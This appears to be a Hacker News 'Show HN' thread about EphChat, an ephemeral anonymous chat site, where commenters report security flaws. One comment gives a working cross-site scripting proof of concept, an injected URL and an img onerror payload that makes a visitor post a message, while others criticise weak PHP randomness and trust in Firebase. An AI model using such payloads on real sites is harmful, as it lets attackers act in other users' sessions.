Show HN: EphChat – Ephemeral, Anonymous, Encrypted Realtime Chat
ephchat.com
ephchat.com
https://ephchat.com/?room=%3C/title%3E%3Cimg%20src=%22http:/...
2. Click change name.
3. Paste the following contents and hit enter.
<img src="#" onerror="javascript:void(function(setVal,sendClick,text){setVal.value=text;sendClick.click();}(document.querySelector('#chatText'),document.querySelector('#chatButton'),'hello'))"/>hiThis is the proper way to do it (h/t @tptacek): http://sockpuppet.org/blog/2014/02/25/safely-generate-random...
mt_srand() + rand() is just hilarious. The md5(uniquid()) thing is a common randomness anti-pattern in PHP projects that needs to die in a fire.
In PHP, a very brief example of the code to achieve the proper way of generating randomness looks like the snippet I posted in the issue.
I have no reason to trust that Firebase isn't storing the messages. Why should I?